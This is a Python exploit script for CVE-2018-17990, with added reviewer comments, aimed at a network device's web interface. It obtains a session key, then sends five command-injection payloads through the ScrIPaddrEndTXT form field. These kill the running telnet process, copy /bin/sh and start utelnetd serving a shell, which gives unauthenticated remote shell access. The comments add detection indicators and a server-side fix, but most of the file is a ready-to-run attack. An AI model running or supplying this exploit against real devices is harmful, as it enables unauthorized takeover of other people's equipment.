cve-2018-17990.py
import requests
import time
import sys
# Proxy for debug purpose
# NOTE(review): no active call in this file uses this mapping; its only reference
# is the commented-out `proxies=proxies` argument on the POST in make_request.
# Neither value is a well-formed proxy URL ('//127.0.0.1:8080' has no scheme and
# 'https:127.0.0.1:8080' lacks '//').
proxies = {'http': '//127.0.0.1:8080', 'https': 'https:127.0.0.1:8080'}
# Help string
# Usage text printed when the two positional arguments cannot be read.
# NOTE(review): the name `help` shadows the Python builtin of the same name.
help = 'Please insert two argument: <Target> and <Port>\nExample: $python cve-2018-17990.py 192.168.0.1 80'
# Banner printed once after the arguments are read and before any request is sent.
welcome = 'Welcome in cve-2018-17990 exploit script!\nPlease BE SURE OF WHAT YOU ARE DOING!\nHappy Hacking\n'
# make_request(target, port, payload, count)
#   Sends one GET followed by one POST to the web GUI at http://<target>:<port>.
#   target, port: host and port, interpolated into the URLs without validation.
#   payload:      string appended to the "ScrIPaddrEndTXT" form field.
#   count:        stage number, placed between "1.1.1." and the payload.
#   Returns nothing; exits the process with status 1 if either request raises.
#
# Defender notes, based only on what this function sends:
#   * Both requests use plain HTTP, and the visible code supplies no credentials or
#     cookies; the only token sent is the value returned by get_sessionKey.asp.
#   * "ScrIPaddrEndTXT" is an address-range field ("ScrIPaddrBeginTXT" holds a
#     dotted quad), yet the value sent here carries extra text after the address.
#     This only has an effect if the device uses the field without validating it,
#     so the fix is server-side: accept only a valid IP address in both range
#     fields and never pass form values to a shell.
#   * Detection: a POST to /cgi-bin/New_GUI/Acl.asp whose ScrIPaddrBeginTXT or
#     ScrIPaddrEndTXT contains anything other than digits and dots is anomalous.
#     In this script each such POST is preceded by a GET to
#     /cgi-bin/get/New_GUI/get_sessionKey.asp carrying the fixed query string
#     "_=1538429663612" and the fixed Chrome/69 User-Agent below.
def make_request(target, port, payload, count):
# Request to obtain a valid session key
url = "http://{}:{}/cgi-bin/get/New_GUI/get_sessionKey.asp?_=1538429663612".format(target, port)
# The same browser-like headers are reused for both requests.
headers = {"Accept": "*/*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-GB,en-US;q=0.9,en;q=0.8,it;q=0.7",
"Connection": "close"
}
try:
r = requests.get(url, headers=headers)
# NOTE(review): the bare except catches every exception, not only network errors,
# and reports all of them as "not reachable".
except:
print '[-] Target not reachable, Exiting...'
exit(1)
# Request to inject the payload
url = "http://{}:{}/cgi-bin/New_GUI/Acl.asp".format(target, port)
# The stripped response body is used as sessionKey as-is; the HTTP status is not checked.
data = {"sessionKey": r.text.strip(), "buttonType": '', "ACLActionFlag": "0",
"ActivateRDOValue": "Yes",
"RuleActiveRDOValue": "Yes",
"ActivateRDO_ck": "on",
"RuleIndexSEL": "0",
"RuleActiveRDO_ck": "on",
"ScrIPaddrBeginTXT": "1.1.1.1",
# The one field that varies between calls: "1.1.1.<count>" followed by the payload text.
"ScrIPaddrEndTXT": "1.1.1.{}{}".format(count, payload),
"ApplicationSEL": "Web",
"InterfaceSEL": "Both"
}
try:
# The response to the POST is discarded, so the script never confirms any effect.
requests.post(url, headers=headers, data=data)#, proxies=proxies)
except:
print '[-] Target not reachable, Exiting...'
exit(1)
# Fixed one-second pause after each POST.
time.sleep(1)
# Script entry point: reads <Target> and <Port> from the command line, then calls
# make_request once per entry in `payloads`, in list order.
if __name__=='__main__':
# Takes as input a target and a port
try:
target = sys.argv[1]
port = sys.argv[2]
print welcome
# Reached when fewer than two arguments are given (sys.argv index out of range);
# being a bare except, it would also swallow any other error raised above.
except:
print help
exit(1)
# Exploit stages in correct order
# Each entry is wrapped in ';' and is sent inside the ScrIPaddrEndTXT form field.
# Read as shell text, the stages (1) write the `ps` lines matching "tel" to a file
# named "a", (2) copy the lines of "a" that do not contain "gr" to a file "b",
# (3) pass the contents of "b" to `kill`, (4) copy /bin/sh into the current
# directory, and (5) start `utelnetd` with the options "-dl sh".
# NOTE(review): presumably "-l sh" makes utelnetd run a shell instead of a login
# prompt - confirm against the utelnetd shipped on the device.
# Host-side indicators that follow from these strings: files named "a", "b" and
# "sh" in the web server's working directory, and a utelnetd process whose command
# line contains "-dl sh". On the network side, a telnet service that appears after
# POSTs to Acl.asp warrants investigation.
payloads = [';ps|grep tel>a;', ';grep -v gr a>b;', ';kill $(cat b);', ';cp /bin/sh .;', ';utelnetd -dl sh;']
# 1-based stage counter; it is also embedded in the address value sent to the device.
count = 1
for payload in payloads:
# The "/5" is hard-coded and equals the current length of `payloads`.
print '[*] Injecting Payload Stage: {}/5'.format(count)
make_request(target, port, payload, count)
count += 1
# Printed unconditionally: no response from the device is inspected, so this
# message does not confirm that any stage had an effect.
print '[+] Exploitation finished, now it is possible to access the device by:\n$ telnet {}'.format(target)